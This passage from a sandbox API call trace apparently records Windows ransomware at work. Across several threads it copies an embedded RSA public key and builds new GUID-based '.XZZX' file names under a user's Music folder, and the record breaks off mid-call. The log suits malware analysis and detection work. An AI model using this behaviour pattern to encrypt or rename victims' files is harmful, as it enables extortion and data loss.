bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.113] lstrcpyW (in: lpString1=0x2baf460, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0245.113] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.113] SetErrorMode (uMode=0x1) returned 0x1 [0245.113] lstrcpyW (in: lpString1=0x2baf860, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0245.113] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x187d1a90, Data2=0x6e76, Data3=0x461d, Data4=([0]=0xa4, [1]=0x7c, [2]=0xda, [3]=0x6e, [4]=0x6, [5]=0x10, [6]=0x9b, [7]=0x66))) returned 0x0 [0245.113] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BA853E823C01028A03C2DABB4021E6D2.XZZX") returned 110 [0245.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.114] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\0B141E601E40C75E187D1A9020FBABA6.XZZX") returned 110 [0245.114] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 980 os_tid = 0x1258 [0245.270] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.270] lstrcpyW (in: lpString1=0x2baf460, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0245.270] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.270] SetErrorMode (uMode=0x1) returned 0x1 [0245.270] lstrcpyW (in: lpString1=0x2baf860, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0245.270] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8a0b05e8, Data2=0x4a32, Data3=0x474c, Data4=([0]=0xba, [1]=0xa4, [2]=0x2a, [3]=0xba, [4]=0xd7, [5]=0xfb, [6]=0x24, [7]=0x33))) returned 0x0 [0245.270] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned 110 [0245.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.270] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\25DC375014A9E4D88A0B05E81764C920.XZZX") returned 110 [0245.270] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 981 os_tid = 0x125c [0245.425] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.425] lstrcpyW (in: lpString1=0x2baf460, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0245.425] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.425] SetErrorMode (uMode=0x1) returned 0x1 [0245.425] lstrcpyW (in: lpString1=0x2baf860, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0245.425] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xcb9dc7ed, Data2=0x20, Data3=0x484a, Data4=([0]=0x8e, [1]=0xa7, [2]=0x48, [3]=0x2, [4]=0x34, [5]=0x46, [6]=0x6d, [7]=0x44))) returned 0x0 [0245.425] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\D02310330D7F24F9EA0895E311A00941.XZZX") returned 110 [0245.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.425] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\73B8FDA000090940CB9DC7ED02C3ED88.XZZX") returned 110 [0245.426] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 982 os_tid = 0x1260 [0245.581] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.581] lstrcpyW (in: lpString1=0x2baf460, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0245.581] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0245.581] SetErrorMode (uMode=0x1) returned 0x1 [0245.581] lstrcpyW (in: lpString1=0x2baf860, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0245.581] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x703afc54, Data2=0xdd6, Data3=0x45f5, Data4=([0]=0xae, [1]=0xd6, [2]=0x23, [3]=0xa1, [4]=0xf5, [5]=0x96, [6]=0xcc, [7]=0xcb))) returned 0x0 [0245.582] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned 110 [0245.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.582] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\D01F323803C7EBCE703AFC540682D016.XZZX") returned 110 [0245.582] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 983 os_tid = 0x1264 [0245.739] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.739] lstrcpyW (in: lpString1=0x2baf460, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0245.739] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.739] SetErrorMode (uMode=0x1) returned 0x1 [0245.739] lstrcpyW (in: lpString1=0x2baf860, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0245.739] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe00ee84f, Data2=0xf3a1, Data3=0x4572, Data4=([0]=0xae, [1]=0x43, [2]=0x2e, [3]=0x79, [4]=0x2e, [5]=0x8c, [6]=0x5f, [7]=0xa6))) returned 0x0 [0245.739] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\04BBA0D020119813F8F6E49024327C5B.XZZX") returned 116 [0245.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.739] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\0FE316AF4216E2B2E00EE84F44D1C6FA.XZZX") returned 116 [0245.739] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 984 os_tid = 0x1268 [0245.893] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0245.893] lstrcpyW (in: lpString1=0x2baf460, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0245.893] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0245.893] SetErrorMode (uMode=0x1) returned 0x1 [0245.893] lstrcpyW (in: lpString1=0x2baf860, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0245.893] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x281e6179, Data2=0xedc7, Data3=0x4ff6, Data4=([0]=0xbd, [1]=0x9a, [2]=0xe0, [3]=0xc8, [4]=0xe7, [5]=0xa2, [6]=0xde, [7]=0x48))) returned 0x0 [0245.893] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned 116 [0245.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0245.893] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\4FDACA0F4A44E63A281E61794CFFCA82.XZZX") returned 116 [0245.894] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 985 os_tid = 0x126c [0246.050] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.050] lstrcpyW (in: lpString1=0x2baf460, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0246.050] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.050] SetErrorMode (uMode=0x1) returned 0x1 [0246.050] lstrcpyW (in: lpString1=0x2baf860, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0246.050] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x5abfd3dd, Data2=0x6833, Data3=0x4ac6, Data4=([0]=0x98, [1]=0x58, [2]=0x2d, [3]=0xcf, [4]=0x72, [5]=0x5f, [6]=0x74, [7]=0x8f))) returned 0x0 [0246.050] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned 116 [0246.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.050] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\0248FD071E6F55725ABFD3DD212A39BA.XZZX") returned 116 [0246.050] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 986 os_tid = 0x1270 [0246.206] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.206] lstrcpyW (in: lpString1=0x2baf460, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0246.206] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.206] SetErrorMode (uMode=0x1) returned 0x1 [0246.206] lstrcpyW (in: lpString1=0x2baf860, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0246.206] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x41522c5a, Data2=0xf17c, Data3=0x49cf, Data4=([0]=0x8f, [1]=0x68, [2]=0x11, [3]=0xbf, [4]=0x4b, [5]=0x39, [6]=0x18, [7]=0xa2))) returned 0x0 [0246.206] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 